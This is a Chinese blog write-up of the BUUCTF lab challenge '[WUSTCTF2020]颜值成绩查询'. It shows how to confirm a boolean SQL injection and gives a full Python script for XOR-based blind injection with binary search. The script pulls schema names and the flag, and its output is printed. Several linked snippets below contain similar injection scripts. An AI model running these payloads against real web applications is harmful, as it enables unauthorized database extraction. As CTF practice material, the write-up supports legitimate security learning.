[WUSTCTF2020]颜值成绩查询

最新推荐文章于 2024-10-08 10:01:21 发布
最新推荐文章于 2024-10-08 10:01:21 发布
阅读量92 收藏
点赞数
分类专栏: CTF 文章标签: oracle 数据库 web安全 安全威胁分析 网络安全 计算机网络 算法
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wp568/article/details/132891448
版权

WUST成绩查询


 

?stunum=1/**/and/**/1=1
 

 输出

?stunum=1/**/and/**/1=2

输出

判断存在布尔注入

利用异或注入
异或的运算法则如下
1 ^ 0 == 1
1 ^ 1 == 0
0 ^ 0 == 0
即相同为0,不同为1。

exp:

import time
import requests
import string

url = "http://bde6030d-4845-46fd-aa0b-427118e9109d.node4.buuoj.cn:81/?stunum="
flag = ''


def payload(i, j):
    # 数据库名字
    # sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1"%(i,j)
    # 表名
    # sql = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='ctf'),%d,1))>%d)^1"%(i,j)
    # 列名
    # sql = "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),%d,1))>%d)^1"%(i,j)
    # 查询flag
    sql = "1^(ord(substr((select(group_concat(value))from(flag)),%d,1))>%d)^1" % (i, j)

    # data = {"stunum": sql}

    r = requests.get(url+sql, timeout=5)
    time.sleep(0.04)
    # print (r.url)
    if "Hi admin" in r.text:
        res = 1
    else:
        res = 0
    return res


def exp():
    global flag
    for i in range(1, 10000):
        print(i, ':')
        low = 31
        high = 127
        while low <= high:
            mid = (low + high) // 2
            res = payload(i, mid)
            if res:
                low = mid + 1
            else:
                high = mid - 1
        f = int((low + high + 1)) // 2
        if (f == 127 or f == 31):
            break
        # print (f)
        flag += chr(f)
        print(flag)

if __name__ == "__main__":
    exp()
    print('输出:', flag)

1、数据库

输出: information_schema,ctf

2、表名

输出: flag,score

3、列名

输出: flag,value

4、取列值

输出: flag{e58481f5-0a73-4f49-a6c5-e92e6806eca2}

半两八金
关注
专栏目录
buuoj WUSTCTF2020颜值成绩查询
pondzhang的专栏
04-18 404
经过测试判断为盲注,编译脚本如下: import requests #database length def get_database_length(): count = 0 while(1): url = "http://de626b0f-7c67-4a3f-b657-89451b2a9923.node3.buuoj.cn/?stunum=0^(length(...
buu-[WUSTCTF2020]颜值成绩查询
qaq517384的博客
10-08 425
[WUSTCTF2020]颜值成绩查询 报了个session的错,先不管 id输1234都有不同回显且url变为/?stunum=1,5就变成用户不存在了 ?stunum=1^0 ?stunum=1^0 可以用异或盲注 import requests url='http://3a1493b4-eefb-4eed-bb52-c5e5cfc25f91.node4.buuoj.cn:81/?stunum=' flag='' for i in range(1,100): low = 32
buuctf-[WUSTCTF2020]颜值成绩查询
2202_75317918的博客
10-01 515
当输入的学号不存在时,只会返回“student number not exists.”。猜测是盲注题,因为看不见其他的回显信息,初步想法是构造值为1或0的表达式来进行探测。发现功能就是输入一个学号,然后返回对应的成绩,就是一个简单的查询操作。如果不采用二分法,会跑的很慢。打开环境,随便输个1看看。
BUUCTF:[WUSTCTF2020]颜值成绩查询
末初的CSDN博客
04-07 1566
SQL盲注 2^if(ascii(mid(database(),1,1))>0,0,1); 先fuzz测试查看有没有过滤了什么,这里过滤了空格,但是我们可以收用/**/来分隔sql语句 先看我根据我的一篇文章布尔型盲注python脚本(功能超级完整)改的脚本 import requests def ascii_str(): # 生成库名表名字符所在的字符列表字典 str_li...
[WUSTCTF2020]颜值成绩查询 1
qq_51553814的博客
08-22 672
[WUSTCTF2020]颜值成绩查询 1 解题 就是一个布尔盲注,尝试自己写了一下python脚本,磕磕绊绊最后还是写出来了 主要是学了一个二分法,理解了一下 import requests url="http://f8aed0d0-ab96-4a36-8022-2a70701fe282.node4.buuoj.cn:81/?stunum=" name='' for i in range(1,100): print(i) low=32 high=128 mid=(lo
[WUSTCTF2020]颜值成绩查询 -wp
freerats的博客
08-05 601
改变参数stunum发现页面会发生变化。 通过尝试可知参数处有boolean盲注,0^1会出现1的内容,因此判断具有盲注。 写脚本跑一下: import requests url='http://57e002cb-19bd-4ceb-bc2a-6960ff6347ac.node3.buuoj.cn/index.php' flag='' for i in range(50): a = 32 b = 128 mid = (a+b)//2 while(a<b): .
[WUSTCTF2020]颜值成绩查询 布尔盲注
qq_37301470的博客
12-02 285
[WUSTCTF2020]颜值成绩查询 只有一个输入框,是sql注入题目 尝试输入1,2,3 可以发现是get方法提交的参数且是数字型 故用hackbar /?stunum=1 or 1=2 %23 student number not exists. 刚刚还可以查到现在查不到了判断存在过滤 尝试下发现是空格 上盲注脚本 import string import requests select=f"select/**/value/**/from/**/flag" ans="" for i in ran
SQL布尔盲注 —— 【WUST-CTF2020】颜值成绩查询
Ve99tr’s Blog
03-30 1977
sql布尔盲注
[WUSTCTF2020]颜值成绩查询(布尔注入)
记录学习,一起进步
01-27 810
[WUSTCTF2020]颜值成绩查询(布尔注入)
BUUCTF--[MRCTF2020]套娃&[WUSTCTF2020]颜值成绩查询
weixin_44016181的博客
10-12 282
BUUCTF--[MRCTF2020]套娃&[WUSTCTF2020]颜值成绩查询,两道buuctf的练习题。python脚本实现比较简单,模板化python真的不要太爽~~
[WUSTCTF2020]颜值成绩查询 布尔注入二分法
m0_64180167的博客
09-26 191
正确回显 100 错误 显示 not。发现回显了 我们可以开始编写脚本跑了。这道题很简单 就是sql注入。我们来学习一下如何写盲注脚本。接下来就是爆破表和字段了。我们使用二分法来写一遍。这里很显然就是盲注了。回显了 就拿这个去咯。
[BUUOJ][WUSTCTF2020]颜值成绩查询 ---二分法
Y4tacker的博客
08-01 7523
import requests url = "http://93b7e81c-3dd4-4eaf-9ddf-8342b4e4bc7a.node3.buuoj.cn/?stunum=" result = "" i = 0 while True: i = i + 1 head = 32 tail = 127 while head < tail: mid = (head + tail) >> 1 # payload = "
MySql - 数据库操作
最新发布
Golemon的博客
10-08 376
【代码】MySql - 数据库操作。
【2024】基于mysqldump的数据备份与恢复
皮皮的博客
10-03 990
本文记录了mysqldump对于MySQL数据库的备份与恢复用法
[WUSTCTF2020]朴实无华
09-19
[WUSTCTF2020]朴实无华是一道CTF比赛的题目。根据给出的代码,该题目包含三个关卡。在第一个关卡中,如果传入的参数$num的整数值小于2020且大于2021,会输出一条特定的字符串。在第二个关卡中,如果传入的参数$md5的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

半两八金

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值